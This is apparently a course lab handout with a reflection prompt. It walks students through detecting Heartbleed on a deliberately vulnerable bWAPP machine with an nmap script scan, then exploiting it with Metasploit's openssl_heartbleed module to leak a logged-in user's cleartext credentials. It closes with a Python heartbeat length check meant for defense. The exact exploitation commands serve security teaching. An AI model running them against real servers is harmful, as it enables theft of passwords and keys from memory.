
Weekly Learning and Reflection 

In two to three paragraphs (i.e., sentences, not bullet lists), using APA style citations if needed, summarize and interact with the content covered in this lab. Summarize what you did as an attacker, what kinds of vulnerabilities you exploited, and what might have prevented these attacks. Mention the attackers and all of the targets in your summary. You can provide topologies, sketches, or graphics if you want. In particular, highlight what surprised, enlightened, or otherwise engaged you. You should think and write critically, not just about what was presented but also about what you have learned through the session. You can ask questions about the things you're confused about. Questions asked here will be summarized and answered anonymously in the next class.

Lab-11: Exploiting Heartbleed Vulnerability

In this lab, you will launch an Nmap script scan against the bWAPP machine and exploit the Heartbleed vulnerability using the Metasploit Framework. bWAPP stands for buggy web application. Like OWASP BWA, bWAPP is a deliberately insecure web application hosting more than 100 web vulnerabilities. Heartbleed is not a classical web application vulnerability (like XSS, SQLi, or CSRF); instead, it is a vulnerability discovered in one of the famous cryptographic libraries. Heartbleed applies to the bWAPP machine because it affects the SSL protocol and, therefore, any web application "secured" by this SSL.

Section-1: Detect Heartbleed Vulnerability by Using Nmap Script Scan

In this section, you will launch an Nmap script scan against the bWAPP machine.

1) Enter the Netlab environment

2) Open Kali Linux machine

3) Open a terminal window by clicking the terminal icon on the bottom menu

4) Type nmap 192.168.2.16 --script ssl-heartbleed -n to check whether the remote machine has the Heartbleed vulnerability. (This command will take 2-3 minutes to show the results.)

Heartbleed is a very critical vulnerability in the OpenSSL cryptographic software library. Note that the Nmap script found the vulnerability on port 8443. bWAPP is hosting a web application on this port. You will revisit this port in the next section.

Take a screenshot of the terminal window showing the vulnerability on port 8443.

Section-2: Exploit Heartbleed Vulnerability by Using Metasploit

In this section, you will exploit the Heartbleed vulnerability you discovered in Section-1. You will use the Metasploit Framework's openssl_heartbleed module to exploit the vulnerability.

1) In the terminal window, type msfconsole to enter Metasploit

2) Type use auxiliary/scanner/ssl/openssl_heartbleed

3) Type show options

4) Type set rhosts 192.168.2.16

5) Type set rport 8443

6) Type set verbose true

7) Now, open a Firefox window and go to https://192.168.2.16:8443

Don’t forget to add the https prefix.

Ignore the security warnings shown by the Firefox browser by clicking the Advanced and “Accept the Risk and Continue” buttons.

8) Click on the first link, named bWAPP

9) Type bee into the Login box and bug into the Password box, then press Enter or click the Login button

10) Switch back to the terminal window, type run, and press Enter so that the exploit will run against the SSL protocol configured on the bWAPP application

Note that you provided your username and password to an https website; your username “bee” and password “bug” are supposed to be encrypted by the SSL protocol.

Metasploit will generate a long result screen showing the applied steps and results. Look closely at the beginning part of the results and spot the username and password in cleartext. Take a screenshot of the part of the result screen showing the username and password in cleartext.
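For the "what might have prevented these attacks" part of the reflection, the following added example (not part of the original lab handout) applies the heartbeat length check from RFC 6520 that patched OpenSSL versions perform: a message whose declared payload length does not fit in the record actually received is discarded. It assumes plaintext TLS record bytes are available, for example at the TLS endpoint; the function names and sample records are constructed for illustration.

```python
import struct

HEARTBEAT = 24      # TLS record content type for heartbeat (RFC 6520)
MIN_PADDING = 16    # RFC 6520 requires at least 16 bytes of padding

def record(ctype: int, fragment: bytes) -> bytes:
    """Build a TLS record: type (1), version (2), length (2), fragment."""
    return struct.pack("!BHH", ctype, 0x0302, len(fragment)) + fragment

def parse_records(stream: bytes):
    """Yield (content_type, fragment) for each complete record in stream."""
    pos = 0
    while pos + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from("!BHH", stream, pos)
        fragment = stream[pos + 5 : pos + 5 + length]
        if len(fragment) < length:
            break  # truncated capture, stop parsing
        yield ctype, fragment
        pos += 5 + length

def check_heartbeat(fragment: bytes) -> str:
    """Classify one heartbeat message as 'ok', 'overread' or 'malformed'."""
    if len(fragment) < 3:
        return "malformed"
    _msg_type, claimed = struct.unpack_from("!BH", fragment, 0)
    # type (1) + length field (2) + claimed payload + padding must fit
    # inside the bytes that were really received; otherwise echoing
    # 'claimed' bytes would read past the message into adjacent memory.
    if 1 + 2 + claimed + MIN_PADDING > len(fragment):
        return "overread"
    return "ok"

def scan(stream: bytes) -> list:
    """Return a verdict for every heartbeat record found in stream."""
    return [check_heartbeat(f) for t, f in parse_records(stream) if t == HEARTBEAT]

# Constructed sample records (not captured from the lab network).
GOOD = record(HEARTBEAT, b"\x01" + struct.pack("!H", 4) + b"ping" + bytes(16))
OTHER = record(23, b"\xaa\xbb")                              # application data
BAD = record(HEARTBEAT, b"\x01" + struct.pack("!H", 0x4000)) # claims 16384, sends 0
SAMPLE = GOOD + OTHER + BAD

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A server that drops every message classified as "overread" never echoes memory beyond the request, so the credentials typed into the login form would not appear in a heartbeat response.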
